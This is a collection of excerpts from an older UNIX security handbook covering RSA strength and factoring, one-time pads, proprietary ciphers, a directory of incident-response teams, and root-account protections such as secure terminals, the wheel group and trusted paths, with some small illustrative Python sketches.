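A sketch of that hybrid pattern, using the third-party pyca/cryptography package, is shown below. The package, the key sizes, and the AES-based Fernet cipher are modern stand-ins chosen for illustration (the text's examples are DES and IDEA); only the overall shape - RSA encrypts a short session key, and the session key encrypts the bulk data - is the point.

# hybrid_sketch.py -- illustrative only; assumes the pyca/cryptography package.
from cryptography.hazmat.primitives.asymmetric import rsa, padding
from cryptography.hazmat.primitives import hashes
from cryptography.fernet import Fernet

# Recipient's RSA key pair (the public half would normally be published).
private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
public_key = private_key.public_key()

# Sender: encrypt the bulk message with a random session key, then encrypt
# only the session key with RSA.
session_key = Fernet.generate_key()
bulk_ciphertext = Fernet(session_key).encrypt(b"a long message goes here")
oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)
wrapped_key = public_key.encrypt(session_key, oaep)

# Recipient: one RSA operation recovers the session key, which then
# decrypts the bulk message.
recovered_key = private_key.decrypt(wrapped_key, oaep)
assert Fernet(recovered_key).decrypt(bulk_ciphertext) == b"a long message goes here"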

6.4.6.3 Strength of RSA<br />

The numbers n and either e or d can be disclosed without seriously compromising the strength of an RSA cipher.<br />

For an attacker to be able to break the encryption, he or she would have to find φ(n), which, to the best of

anyone's knowledge, requires factoring n.<br />

Factoring large numbers is very difficult - no known method exists to do it efficiently. The time required to factor<br />

a number can be several hundred years or several billion years with the fastest computers, depending on how<br />

large the number n is. If n is large enough, it is, for all intents and purposes, unfactorable. The RSA encryption<br />

system is therefore quite strong, provided that appropriate values of n, e, and d are chosen, and that they are kept<br />

secret.<br />

To see how difficult factoring a large number is, let's do a little rough calculation of how long factoring a 200<br />

decimal-digit number would take; this number is more than 70 digits longer than the largest number ever<br />

factored, as of the time this book went to press.<br />

All 200-digit values can be represented in at most 665 binary bits. In general, to factor a 665-bit number (n on the order of 10^200) using one of the fastest-known factoring algorithms would require approximately e^sqrt(ln n x ln ln n), or about 1.2 x 10^23 operations.

Let's assume you have a machine that will do 10 billion (10^10) operations per second. (Somewhat faster than today's fastest parallel computers.) To perform 1.2 x 10^23 operations would require 1.2 x 10^13 seconds, or 380,267 years' worth of computer time. If you feel uneasy about having your number factored in 380,267 years, simply double the size of your prime number: a 400-digit number would require a mere 8.6 x 10^15 years to factor. This is probably long enough; according to Stephen Hawking's A Brief History of Time, the universe itself is only about 2 x 10^10 years old.
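These figures follow from the running-time expression given above; a quick check in Python (the seconds-per-year constant and the rounding are additions, the rest comes from the text):

# factoring_estimate.py -- rough work factor for factoring a 200-digit number.
import math

digits = 200
ln_n = digits * math.log(10)                              # ln(10^200)
operations = math.exp(math.sqrt(ln_n * math.log(ln_n)))   # about 1.2e23

ops_per_second = 10**10                                   # the 10-billion-op machine
years = operations / ops_per_second / (365.25 * 24 * 3600)
print(f"about {operations:.2g} operations, about {years:,.0f} years")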

To give you another perspective on the size of these numbers, assume that you (somehow) could precalculate the<br />

factors of all 200 decimal digit numbers. Simply to store the unfactored numbers themselves would require<br />

approximately (9 x 10^200) x 665 bits of storage (not including any overhead or indexing). Assume that you can store these on special media that hold 100GB (100 x 1024^4, or approximately 1.1 x 10^14) of storage. You would need about 6.12 x 10^189 of these disks.

Now assume that each of those disks is only one millionth of a gram in weight (1 pound is 453.59 grams). The weight of all your storage would come to over 6.75 x 10^177 tons of disk. The planet Earth weighs only 6.588 x 10^21 tons. The Chandrasekhar limit, the amount of mass at which a star will collapse into a black hole, is about 1.5 times the mass of our Sun, or approximately 3.29 x 10^27 tons. Thus, your storage, left to itself, would collapse into a black hole from which your factoring

could not escape! We are not sure how much mass is in our local galaxy, but we suspect it might be less than the<br />

amount you'd need for this project.<br />

Again, it looks fairly certain that without a major breakthrough in number theory, the RSA mechanism (and similar methods) is almost assuredly safe from brute-force attacks, provided that you are careful in selecting appropriately large prime numbers to create your key.

Factor This!<br />


Not a year goes by without someone claiming to have made a revolutionary breakthrough in the field of factoring<br />

- some new discovery which "breaks" RSA and leaves any program based upon it vulnerable to decoding.<br />

To help weed out the frauds from the real findings, RSA Data <strong>Sec</strong>urity has created a challenge list of numbers.<br />

Each number on the list is the product of two large prime numbers. When the folks at RSA are contacted by<br />

somebody who claims a factoring breakthrough (and usually promises to keep the breakthrough a secret in<br />

exchange for some cash), they give the person a copy of the RSA challenge numbers.<br />

The first RSA challenge number was published in the August 1977 issue of Scientific American. The number was<br />

129 digits long, and $100 was offered for finding its factors. The RSA-129 number was solved in the fall of 1994<br />

by an international team of more than 600 volunteers.<br />

A month later, a researcher at the MIT AI Laboratory contacted one of the authors of this chapter, claiming a new<br />

factoring breakthrough. But there was a catch: to prove that he had solved the factoring problem, the researcher<br />

had factored that same RSA-129 number.<br />

Nice try. That one has already been solved. If you are interested in the fame and fortune that comes from finding<br />

new factoring functions, try factoring this:<br />

RSA-140 =<br />

2129024631825875754749788201627151749780670396327721627823338321538194<br />

9984056495911366573853021918316783107387995317230889569230873441936471<br />

If you factor this number, you'll get more than fame: you'll get cash. RSA Data <strong>Sec</strong>urity keeps a "jackpot" for<br />

factoring winners. The pot grows by $1750 every quarter. In the first quarter of 1995, it was approximately

$15,000.<br />

You can get a complete list of all the RSA challenge numbers by sending an electronic mail message to<br />

challenge-rsa-list@rsa.com.<br />

6.4.7 An Unbreakable Encryption Algorithm<br />

One type of encryption system is truly unbreakable: the so-called one-time pad mechanism. A one-time pad is<br />

illustrated in Figure 6.4.<br />

The one-time pad often makes use of the mathematical function known as exclusive OR (XOR, ⊕). If you XOR a number with any value V, then you get a second, encrypted number. XOR the encrypted number with the value V a second time, and you'll get your starting number back. That is:

message = M

ciphertext = M ⊕ V

plaintext = ciphertext ⊕ V = ((M ⊕ V) ⊕ V)

A system based on one-time pads is mathematically unbreakable (provided that the key itself is truly random)<br />

because you can't do a key search: if you try every possible key, you will get every possible message of the same<br />

length back. How do you tell which one is correct?<br />

Unfortunately, there is a catch: to use this system, you need to have a stream of values - a key, if you will - that is<br />

at least as long as the message you wish to encrypt. Each character of your message is XOR'ed, bit by bit, with<br />

each successive character of the stream.<br />


Figure 6.4: A one-time pad<br />

One-time pads have two important vulnerabilities:<br />

1. The stream of random values must be truly random. If there is any regularity or order, that order can be measured and exploited to decode the message.

2. The stream must never be repeated. If it is, a sophisticated cryptanalyst can find the repeats and use them to decode all messages that have been encoded with the no-longer one-time pad.

Most one-time pads are generated with machines based on nuclear radioactive decay, a process that is believed to<br />

be unpredictable, if not truly random. Almost every "random number generator" you will find on any standard<br />

computer system will not generate truly random numbers: the sequence will eventually repeat.<br />

To see how this encryption mechanism works in practice, imagine the following one-time pad:<br />

23 43 11 45 23 43 98 43 52 86 43 87 43 92 34<br />

With this sequence, the message:<br />

<strong>UNIX</strong> is secure.<br />

Might encrypt as follows:<br />

:\:\:s*:3:\rEs[drNERwe.<br />


Which is really a printed representation of the following string of values:<br />

69 98 85 55 66 17 11 71 51 72 34 89 57 12<br />
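In code, the XOR mechanism is only a few lines. The sketch below is generic rather than a reproduction of the exact pad and byte values printed above, and it draws the pad from the operating system's entropy source because, as noted earlier, an ordinary pseudorandom generator is not good enough.

# one_time_pad.py -- XOR-based one-time pad, sketched in Python.
import os

message = b"UNIX is secure."
pad = os.urandom(len(message))     # the pad must be as long as the message
                                   # and must never be reused

ciphertext = bytes(m ^ p for m, p in zip(message, pad))
recovered  = bytes(c ^ p for c, p in zip(ciphertext, pad))

print(ciphertext.hex())            # looks like random bytes
assert recovered == message        # XOR with the same pad restores the text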

To use a one-time pad system, you need two copies of the pad: one to encrypt the message, and the other to<br />

decrypt the message. Each copy must be destroyed after use; after all, if an attacker should ever obtain a copy of<br />

the pad, then any messages sent with it would be compromised.<br />

One of the main uses of one-time pads has been for sensitive diplomatic communications that are subject to<br />

heavy monitoring and intensive code breaking attempts - such as the communication lines between the U.S.<br />

Embassy in Moscow and the State Department in Washington, D.C. However, the general use of one-time pads is<br />

limited because generating the sequence of random bits is difficult, and distributing it securely to both the sender<br />

and the recipient of the message is expensive.<br />

Because of the problems associated with one-time pads, other kinds of algorithms are normally employed for<br />

computer encryption. These tend to be compact, mathematically based functions. The mathematical functions are<br />

frequently used to generate a pseudorandom sequence of numbers that are XOR'ed with the original message -<br />

which is similar to the way the one-time pad works. (For example, Jim Bidzos, president of RSA Data <strong>Sec</strong>urity,<br />

likes to call its RC4 stream cipher a "one-time pad generator," although the cipher is clearly not such a thing.)<br />

The difference between the two techniques is that, with mathematical functions, you can always - in principle, at<br />

least - translate any message encrypted with these methods back into the original message without knowing the<br />

key.<br />

6.4.8 Proprietary Encryption Systems<br />

The RC4 algorithm mentioned in the previous section is an example of a so-called proprietary encryption<br />

algorithm: an encryption algorithm developed by an individual or company which is not made publicly available.<br />

There are many proprietary algorithms in use today. Usually, the algorithms are private key algorithms that are<br />

used in place of algorithms such as DES or IDEA.[20] Although some proprietary systems are relatively secure,<br />

the vast majority are not. To make matters worse, you can rarely tell which are safe and which are not - especially<br />

if the company selling the encryption program refuses to publish the details of the algorithm.<br />

[20] While creating a public key encryption system is difficult, creating a private key system is<br />

comparatively easy. Making a private key system that is secure, on the other hand, is a considerably<br />

more difficult endeavor.<br />

A standard tenet in data encryption is that the security of the system should depend completely on the security of<br />

the encryption key. When choosing an encryption system, rely on formal mathematical proofs of security, rather<br />

than on secret proprietary systems. If the vendor of an encryption algorithm or technology will not disclose the<br />

algorithm and show how it has been analyzed to show its strength, you are probably better off avoiding it.<br />

The RC4 algorithm is no exception to this tenet. In 1994, an unknown person or persons published source code<br />

that claimed to be RC4 on the <strong>Internet</strong>. By early 1996, a number of groups around the world had started to find<br />

minor flaws in the algorithm, most of them having to do with weak keys. Although RC4 appears to be secure for<br />

most applications at this time, the clock may be ticking.<br />




Appendix F<br />

Organizations<br />

F.3 Emergency Response Organizations<br />

The Department of Justice, FBI, and U.S. <strong>Sec</strong>ret Service organizations listed below investigate violations<br />

of the federal laws described in Chapter 26, Computer <strong>Sec</strong>urity and U.S. Law. The various response<br />

teams that comprise the Forum of Incident and Response <strong>Sec</strong>urity Teams (FIRST) do not investigate<br />

computer crimes per se, but provide assistance when security incidents occur; they also provide research, information, and support that can often help keep such incidents from occurring or spreading.

F.3.1 Department of Justice (DOJ)<br />

Criminal Division<br />

General Litigation and Legal<br />

Advice <strong>Sec</strong>tion<br />

Computer Crime Unit<br />

Department of Justice<br />

Washington, DC 20001<br />

Voice: +1-202-514-1026<br />

F.3.2 Federal Bureau of Investigation (FBI)<br />

National Computer Crimes Squad<br />

Federal Bureau of Investigation<br />

7799 Leesburg Pike<br />

South Tower, Suite 200<br />

Falls Church, VA 22043<br />

Voice: +1-202-324-9164<br />

F.3.3 U.S. <strong>Sec</strong>ret Service (USSS)<br />

Financial Crimes Division, Electronic Crime Branch

U.S. Secret Service

Washington, DC 20001

Voice: +1-202-435-7700


F.3.4 Forum of Incident and Response <strong>Sec</strong>urity Teams (FIRST)<br />

The Forum of Incident and Response <strong>Sec</strong>urity Teams (FIRST) was established in March 1993. FIRST is<br />

a coalition that brings together a variety of computer security incident-response teams from the public<br />

and private sectors, as well as from universities. FIRST's constituents comprise many response teams<br />

throughout the world. FIRST's goals are to:<br />

● Boost cooperation among information technology users in the effective prevention of, detection of, and recovery from computer security incidents

● Provide a means to alert and advise clients on potential threats and emerging incident situations

● Support and promote the actions and activities of participating incident response teams, including research and operational activities

● Simplify and encourage the sharing of security-related information, tools, and techniques

FIRST sponsors an annual workshop on incident response that includes tutorials and presentations by<br />

members of response teams and law enforcement.<br />

FIRST incorporated in mid-1995 as a nonprofit entity. One consequence of this is a migration of FIRST<br />

<strong>Sec</strong>retariat duties away from NIST. However, as this book goes to press, the <strong>Sec</strong>retariat can still be<br />

reached at:<br />

FIRST <strong>Sec</strong>retariat<br />

Forum of Incident and Response <strong>Sec</strong>urity Teams<br />

National Institute of Standards and Technology<br />

A-216 Technology Building<br />

Gaithersburg, MD 20899-0001<br />

Phone: +1-301-975-3359<br />

Email: first-sec@first.org<br />

http://www.first.org/first<br />

At the time this book went to press, FIRST consisted of the organizations that are listed below (also<br />

provided is a description of the constituencies served by each of the organizations). Check online for the<br />

most up-to-date list of members.<br />

If you have a security problem or need assistance, first attempt to determine which of these organizations<br />

most clearly covers your operations and needs. If you are unable to determine which (if any) FIRST<br />

group to approach, call any of them for a referral to the most appropriate team.<br />

Most of these response teams have a PGP key with which they sign their advisories or enable<br />

constituents to report problems in confidence. A copy of the PGP keyring is kept as:<br />

ftp://coast.cs.purdue.edu/pub/response-teams/first-contacts-keys.asc<br />

Most teams have arrangements to monitor their phones 24 hours a day, 7 days a week.<br />

F.3.4.1 All <strong>Internet</strong> sites<br />


Organization: CERT Coordination Center<br />

Email: cert@cert.org<br />

Telephone: +1-412-268-7090<br />

FAX: +1-412-268-6989

FTP: ftp://info.cert.org

WWW: http://www.sei.cmu.edu/technology/trustworthy.html<br />

Note: The CERT (sm) Coordination Center (CERT-CC)<br />

is the organization that grew from the computer emergency response<br />

team formed by the Advanced Research Projects Agency (ARPA) in November<br />

1988 (in the wake of the <strong>Internet</strong> Worm and similar incidents). The<br />

CERT charter is to work with the <strong>Internet</strong> community to facilitate<br />

its response to computer security events involving <strong>Internet</strong> hosts,<br />

to take proactive steps to raise the community's awareness<br />

of computer security issues, and to conduct research into improving<br />

the security of existing systems. Their WWW and FTP archives contain an extensive collection of alerts about past (and current) security problems.

F.3.4.2 ANS customers<br />

Organization: Advanced Network & Services, Inc. (ANS)<br />

Email: anscert@ans.net<br />

Voice: +1-313-677-7333<br />

FAX: +1-313-677-7310<br />

F.3.4.3 Apple Computer worldwide R&D community<br />

Organization: Apple COmputer REsponse Squad (Apple CORES)

Email: lsefton@apple.com

Voice: +1-408-974-5594

FAX: +1-408-974-4754

F.3.4.4 Australia: <strong>Internet</strong> .au domain<br />

Organization: Australian Computer Emergency Response Team (AUSCERT)<br />

Email: auscert@auscert.org.au<br />

Voice: +61-7-3365-4417<br />

FAX: +61-7-3365-4477<br />

WWW: http://www.auscert.org.au<br />

F.3.4.5 Bellcore<br />

Organization: Bellcore<br />

Email: sb3@cc.bellcore.com<br />


Voice: +1-908-758-5860<br />

FAX: +1-908-758-4504<br />

F.3.4.6 Boeing<br />

Organization: Boeing CERT (BCERT)<br />

Email: compsec@maple.al.boeing.com<br />

Voice: +1-206-657-9405<br />

After Hours: +1-206-655-2222<br />

FAX: +1-206-657-9477<br />

Note: All Boeing computing and communication assets for all<br />

Boeing Divisions headquartered in Seattle, Washington, with major<br />

out plant operations in Wichita, Kansas; Philadelphia, Pennsylvania;<br />

Huntsville, Alabama; Houston, Texas; Winnipeg, Canada; and worldwide<br />

customer interface offices.<br />

F.3.4.7 Italy: <strong>Internet</strong> sites<br />

Organization: CERT-IT<br />

Email: cert-it@dsi.unimi.it<br />

Telephone: +39-2-5500-391<br />

Emergency Phone: +39-2-5500-392<br />

FAX: +39-2-5500-394<br />

F.3.4.8 CISCO Systems<br />

Organization: Network <strong>Sec</strong>urity Council<br />

Email: karyn@cisco.com<br />

Telephone: +1-408-526-5638<br />

FAX: +1-408-526-5420<br />

F.3.4.9 Digital Equipment Corporation and customers<br />

Organization: SSRT (Software <strong>Sec</strong>urity Response Team)<br />

Email: rich.boren@cxo.mts.dec.com<br />

Voice: +1-800-354-9000<br />

Emergency Phone: +1-800-208-7940<br />

FAX: +1-901-761-6792<br />

F.3.4.10 DOW USA<br />

Organization: DOW USA<br />

Email: whstewart@dow.com<br />

Voice: +1-517-636-8738<br />

FAX: +1-517-638-7705<br />


F.3.4.11 EDS and EDS customers worldwide<br />

Organization: EDS<br />

Email: jcutle01@novell.trts01.eds.com<br />

Voice: +1-313-265-7514<br />

FAX: +1-313-265-3432<br />

F.3.4.12 France: universities, Ministry of Research and Education in France, CNRS, CEA,<br />

INRIA, CNES, INRA, IFREMER, and EDF<br />

Organization: RENATER<br />

Email: morel@urec.fr<br />

Voice: +33-1-44-27-26-12<br />

FAX: +33-1-44-27-26-13<br />

F.3.4.13 General Electric<br />

Organization: General Electric Company<br />

Email: sandstrom@geis.geis.com<br />

Voice: +1-301-340-4848<br />

FAX: +1-301-340-4059<br />

F.3.4.14 Germany: DFN-WiNet <strong>Internet</strong> sites<br />

Organization: DFN-CERT (Deutsches Forschungsnetz)<br />

Email: dfncert@cert.dfn.de<br />

Telephone: +49-40-54715-262<br />

FAX: +49-40-54715-241<br />

FTP: ftp://ftp.cert.dfn.de/pub<br />

WWW: http://www.cert.dfn.de<br />

Note: The DFN-CERT maintains an extensive online archive of<br />

tools, advisories, newsletters and information from other teams<br />

and organizations. It also maintains a directory of European response<br />

teams.<br />

F.3.4.15 Germany: government institutions<br />

Organization: BSI/GISA<br />

Email: fwf@bsi.de<br />

Telephone: +49-228-9582-444<br />

FAX: +49-228-9852-400<br />

F.3.4.16 Germany: Southern area<br />


Organization: Micro-BIT Virus Center<br />

Email: ry15@rz.uni-karlsruhe.de<br />

Voice: +49-721-37-64-22<br />

Emergency Phone: +49-171-52-51-685<br />

FAX: +49-721-32-55-0<br />

F.3.4.17 Hewlett-Packard customers<br />

Organization: HP <strong>Sec</strong>urity Response Team<br />

Email: security-alert@hp.com<br />

F.3.4.18 JP Morgan employees and customers<br />

Organization: JP Morgan Incident Response Team<br />

Telephone: +1-212-235-5010<br />

F.3.4.19 MCI Corporation<br />

Organization: Corporate System <strong>Sec</strong>urity<br />

Email: 6722867@mcimail.com<br />

Telephone: +1-719-535-6932<br />

FAX: +1-719-535-1220<br />

F.3.4.20 MILNET<br />

Response Team: DDN (Defense Data Network)

Email: scc@nic.ddn.mil<br />

Voice: +1-800-365-3642<br />

FAX: +1-703-692-5071<br />

F.3.4.21 Motorola, Inc. and subsidiaries<br />

Response Team: Motorola Computer Emergency Response Team (MCERT)

Email: mcert@mot.com<br />

Voice: +1-847-576-1616<br />

Emergency Phone: +1-847-576-0669<br />

FAX: +1-847-538-2153<br />

F.3.4.22 NASA: Ames Research Center<br />

Organization: NASA Ames<br />

Email: hwalter@nas.nasa.gov<br />

Telephone: +1-415-604-3402<br />

FAX: +1-415-604-4377<br />

F.3.4.23 NASA: Goddard Space Flight Center<br />


Organization: Goddard Space Flight Center<br />

Email: hmiddleton@gsfcmail.nasa.gov<br />

Telephone: +1-301-286-7233<br />

FAX: +1-301-286-2923<br />

F.3.4.24 NASA: NASA-wide<br />

Organization: NASA Automated Systems Incident Response Capability<br />

Email: nasirc@nasirc.nasa.gov<br />

Voice: +1-800-762-7472 (U.S.)<br />

After Hours: +1-800-759-7243, pin 2023056<br />

FAX: +1-301-441-1853<br />

F.3.4.25 Netherlands: SURFnet-connected sites<br />

Organization: CERT-NL<br />

Email: cert-nl@surfnet.nl<br />

Telephone: +31-302-305-305<br />

FAX: +31-302-305-329<br />

F.3.4.26 NIST (National Institute of Standards and Technology)<br />

Organization: NIST/CSRC<br />

Email: jwack@nist.gov<br />

Telephone: +1-301-975-3359<br />

FAX: +1-301-948-0279<br />

F.3.4.27 NORDUNET: Denmark, Sweden, Norway, Finland, Iceland<br />

Organization: Nordunet<br />

Email: ber@sunet.se<br />

Telephone: +46-8-790-6513<br />

FAX: +46-8-24-11-79<br />

F.3.4.28 Northwestern University<br />

Organization: NU-CERT<br />

Email: nu-cert@nwu.edu<br />

Telephone: +1-847-491-4056<br />

FAX: +1-847-491-3824<br />

F.3.4.29 Pennsylvania State University<br />

Organization: Penn State<br />

Email: krk5@psuvm.psu.edu<br />

Voice: +1-814-863-9533<br />

After Hours: +1-814-863-4375<br />


FAX: +1-814-865-3082<br />

F.3.4.30 Purdue University<br />

Organization: PCERT<br />

Email: pcert@cs.purdue.edu<br />

Voice: +1-317-494-7844<br />

After Hours: +1-317-743-4333, pin 4179<br />

FAX: +1-317-494-0739<br />

F.3.4.31 Small Business Association (SBA): small business community nationwide<br />

Organization: SBA CERT<br />

Email: hfb@oirm.sba.gov<br />

Voice: +1-202-205-6708<br />

FAX: +1-202-205-7064<br />

F.3.4.32 Sprint<br />

Organization: Sprint DNSU<br />

Email: steve.matthews@sprint./sprint.com<br />

Voice: +1-703-904-2406<br />

FAX: +1-703-904-2708<br />

F.3.4.33 Stanford University<br />

Response Team: SUNSet - Stanford University Network <strong>Sec</strong>urity Team<br />

Email: security@stanford.edu<br />

Telephone: +1-415-723-2911<br />

FAX: +1-415-725-1548<br />

F.3.4.34 Sun Microsystems customers<br />

Organization: Sun Microsystem's Customer Warning System (CWS)<br />

Email: security-alert@sun.com<br />

Voice: +1-415-688-9151<br />

FAX: +1-415-688-8674<br />

F.3.4.35 SWITCH-connected sites<br />

Organization: SWITCH-CERT<br />

Email: cert-staff@switch.ch<br />

Telephone: +41-1-268-1518<br />

FAX: +41-1-268-1568<br />

WWW: http://www.switch.ch/switch/cert<br />

Note: SWITCH is the Swiss Academic and Research Network.


F.3.4.36 TRW network area and system administrators<br />

Computer Emergency Response Committee for Unclassified Systems<br />

Email: zorn@gumby.sp.trw.com<br />

Voice: +1-310-812-1839, 9-5PM, PST<br />

FAX: +1-310-813-4621<br />

F.3.4.37 UK: Defense Research Agency<br />

Organization: Defense Research Agency, Malvern<br />

Email: shore@ajax.dra.hmg.gb<br />

Telephone: +44-1684-895425<br />

FAX: +44-1684-896113<br />

F.3.4.38 U.K. JANET network<br />

Organization: JANET-CERT<br />

Email: cert@cert.ja.net<br />

Telephone: +44-01235-822-302<br />

Fax: +44-01235-822-398<br />

F.3.4.39 UK: other government departments and agencies<br />

Organization: CCTA

Email: cbaxter.esb.ccta@gnet.gov.uk

Voice: +44-0171-824-4101/2<br />

FAX: +44-0171-305-3178<br />

F.3.4.40 Unisys internal and external users<br />

Organization: UCERT<br />

Email: garb@po3.bb.unisys.com<br />

Voice: +1-215-986-4038<br />

FAX: +1-212-986-4409<br />

F.3.4.41 U.S. Air Force<br />

Organization: AFCERT<br />

Email: afcert@afcert.csap.af.mil<br />

Voice: +1-210-977-3157<br />

FAX: +1-210-977-4567<br />

F.3.4.42 U.S. Department of Defense<br />

Organization: ASSIST<br />

Email: assist@assist.mil<br />

Voice: +1-800-357-4231 (DSN 327-4700)<br />


FAX: +1-703-607-4735 (DSN 327-4735)<br />

F.3.4.43 U.S. Department of Energy sites, Energy Sciences Network (ESnet), and DOE<br />

contractors<br />

Organization: CIAC (Computer Incident Advisory Capability)<br />

Email: ciac@llnl.gov<br />

Voice: +1-510-422-8193<br />

FAX: +1-510-423-8002<br />

FTP: ftp://ciac.llnl.gov/pub/ciac<br />

WWW: http://ciac.llnl.gov<br />

Note: The CIAC maintains an extensive online archive of tools,<br />

advisories, newsletters, and other information.<br />

F.3.4.44 U.S. Department of the Navy<br />

Organization: NAVCIRT (Naval Computer Incident Response Team)<br />

Email: ldrich@fiwc.navy.mil<br />

Voice: +1-804-464-8832<br />

Pager: +1-800-SKYPAGE, pin # 5294117<br />

F.3.4.45 U.S. Veteran's Health Administration<br />

Organization: Veteran's Health Incident Response <strong>Sec</strong>urity Team<br />

Email: frank.marino@forum.va.gov<br />

Telephone: +1-304-263-0811, ext 4062<br />

FAX: +1-304-263-4748<br />

F.3.4.46 Westinghouse Electric Corporation<br />

Response Team: (W)CERT

Email: Nicholson.M%wec@dialcom.tymnet.com<br />

Voice: +1-412-642-3097<br />

FAX: +1-412-642-3871<br />




Chapter 8<br />

Defending Your Accounts<br />

8.5 Protecting the root Account<br />

Versions of <strong>UNIX</strong> that are derived from Berkeley <strong>UNIX</strong> systems provide two additional methods of<br />

protecting the root account:<br />

● Secure terminals

● The wheel group

A few systems provide an additional set of features, known as a trusted path and a trusted computing<br />

base (TCB).<br />

8.5.1 <strong>Sec</strong>ure Terminals<br />

Because every <strong>UNIX</strong> system has an account named root, this account is often a starting point for people<br />

who try to break into a system by guessing passwords. One way to decrease the chance of this is to<br />

restrict logins from all but physically guarded terminals. If a terminal is marked as restricted, the<br />

superuser cannot log into that terminal from the login: prompt. (However, a legitimate user who knows<br />

the superuser password can still use the su command on that terminal after first logging in.)<br />

On a SVR4 machine, you can restrict the ability of users to log in to the root account from any terminal<br />

other than the console. You accomplish this by editing the file /etc/default/login and inserting the line:<br />

CONSOLE=/dev/console<br />

This line prevents anyone from logging in as root on any terminal other than the console. If the console is<br />

not safe, you may set this to the pathname of a nonexistent terminal.<br />

Some older Berkeley-derived versions of <strong>UNIX</strong> allow you to declare terminal lines and network ports as<br />

either secure or not secure. You declare a terminal secure by appending the word "secure" to the<br />

terminal's definition in the file /etc/ttys:[5]<br />

[5] Under SunOS and some other versions of <strong>UNIX</strong>, this file is called /etc/ttytab. Some<br />

older versions of BSD store the list of secure ports in the file /etc/securettys.<br />

tty01 "/usr/etc/getty std.9600" vt100 on secure<br />

tty02 "/usr/etc/getty std.9600" vt100 on<br />

In this example taken from a /etc/ttys file, terminal tty01 is secure and terminal tty02 is not. This means<br />

that root can log into terminal tty01 but not tty02.<br />


Note that after changing the /etc/ttys file, you may need to send a hangup signal to the init process before the changes will take effect. On a BSD-derived system, run:

# kill -1 1<br />

Other systems vary, so check your own system's documentation.<br />

You should carefully consider which terminals are declared secure. Many sites, for example, make neither their dial-in modems nor their network connections secure; this prevents intruders from using

these connections to guess the system's superuser password. Terminals in public areas should also not be<br />

declared secure. Being "not secure" does not prevent a person from executing commands as the<br />

superuser: it simply forces users to log in as themselves and then use the su command to become root.<br />

This method adds an extra layer of protection and accounting.<br />

On the other hand, if your computer has a terminal in a special machine room, you may wish to make this<br />

terminal secure so you can quickly use it to log into the superuser account without having first to log into<br />

your own account.<br />

NOTE: Many versions of <strong>UNIX</strong> require that you type the superuser password when booting<br />

in single-user mode if the console is not listed as "secure" in the /etc/ttys file. Obviously, if<br />

you do not mark your console "secure," you enhance your system's security.<br />
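If you administer several BSD-style machines, a short script can report which terminal lines are currently marked secure. The sketch below is a hypothetical helper, not a standard utility; it assumes the /etc/ttys format shown above (on your system the file may be /etc/ttytab or /etc/securettys instead).

# check_secure_ttys.py -- list terminals that permit direct root logins.
TTYS = "/etc/ttys"        # adjust for /etc/ttytab or /etc/securettys systems

with open(TTYS) as f:
    for line in f:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        status = "SECURE (root may log in here)" if "secure" in fields else "not secure"
        print(f"{fields[0]:<12} {status}")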

8.5.2 The wheel Group<br />

Another mechanism that further protects the root account is the wheel group. A user who is not in the<br />

wheel group cannot use the su command to become the superuser. Be very careful about who you place<br />

in the wheel group; on some versions of <strong>UNIX</strong>, people in the wheel group can provide their own<br />

passwords to su - instead of the superuser password - and become root.<br />
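A companion sketch (again a hypothetical helper, assuming the standard Python pwd and grp modules and a group actually named "wheel") lists the accounts that would be allowed to su to root under this scheme:

# wheel_members.py -- list accounts in the wheel group.
import grp, pwd

try:
    wheel = grp.getgrnam("wheel")
except KeyError:
    raise SystemExit("this system has no wheel group")

members = set(wheel.gr_mem)
# include users whose primary group is wheel as well
members.update(u.pw_name for u in pwd.getpwall() if u.pw_gid == wheel.gr_gid)

for name in sorted(members):
    print(name)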

8.5.3 TCB and Trusted Path<br />

When you are worried about security, you want to ensure that the commands you execute are the real<br />

system commands and not something designed to steal your password or corrupt your system. Some<br />

versions of <strong>UNIX</strong> have been augmented with special features to provide you with this additional<br />

assurance.<br />

8.5.3.1 Trusted path<br />

Consider the case where we approach a terminal and wish to log in to the system. What is a potential<br />

problem? What if someone has left a program - a Trojan Horse[6] program - running on the terminal? If<br />

the program has been designed to capture our password by presenting a prompt that looks like the real<br />

login program, we might not be able to tell the difference until the damage is done. If the program has<br />

been very carefully crafted to catch signals and otherwise mimic the login program behavior, we might<br />

not catch on at all. And if you are not using one-time passwords (described later in <strong>Sec</strong>tion 8.7,<br />

"One-Time Passwords), you may be giving someone else access to your account.<br />

[6] Trojan Horse programs are defined in more detail in Chapter 11, Protecting Against<br />

Programmed Threats.<br />


The solution to this is to provide a trusted path to the login program from our terminal. Some <strong>UNIX</strong><br />

systems, including AIX and Ultrix, can be configured to recognize a special signal from hardwired<br />

terminals (including workstation consoles) for this purpose. When the signal (usually a BREAK, or some<br />

sequence of control characters) is received by the low-level terminal driver, the driver sends an unstoppable signal that terminates all processes still connected to the terminal. Thereafter, a new

session is started and the user can be assured that the next prompt for a login is from the real system<br />

software.<br />

For a trusted path mechanism to work, you must have a hardwired connection to the computer: any<br />

networked connection can be intercepted and spoofed.[7] The system administrator must enable the<br />

trusted path mechanism and indicate to which terminal lines it is to be applied. As this may require<br />

reconfiguring your kernel and rebooting (to include the necessary terminal code), you should carefully<br />

read your vendor documentation for instructions on how to enable this feature.<br />

[7] Network logins have other potential problems, such as password sniffing.

If your system provides the trusted path mechanism and you decide to use it, be sure to limit superuser<br />

logins to only the associated terminals!<br />

8.5.3.2 Trusted computing base<br />

After we've logged in, we may be faced with situations where we are not quite certain if we are executing<br />

a trusted system command or a command put in place by a prankster or intruder. If we are running as the<br />

superuser, this uncertainty is a recipe for disaster, and is why we repeatedly warn you throughout the<br />

book to leave the current directory out of your search path, and to keep system commands protected.<br />

Some systems can be configured to mark executable files as part of the trusted computing base (TCB).<br />

Files in the TCB are specially marked by the superuser as trusted. When running a special trusted shell,<br />

only files with the TCB marking can be executed with exec(). Thus, only trusted files can be executed.

How do files get their trusted markings? New files and modified TCB files have the marking turned off.<br />

The superuser can mark new executable files as part of the TCB; on some systems, this process can only<br />

be done if the file was created with programs in the TCB. In theory, an attacker will not be able to become the superuser (or set the marking on files), and thus the superuser cannot accidentally execute dangerous code.

This feature is especially worthwhile if you are administering a multiuser system, or if you tend to import<br />

files and filesystems from other, potentially untrusted, systems. However, you must keep in mind that the<br />

marking does not necessarily mean that the program is harmless. As the superuser can mark files as part<br />

of the TCB, some of those files might be dangerous. Thus, remember that the TCB, like any other<br />

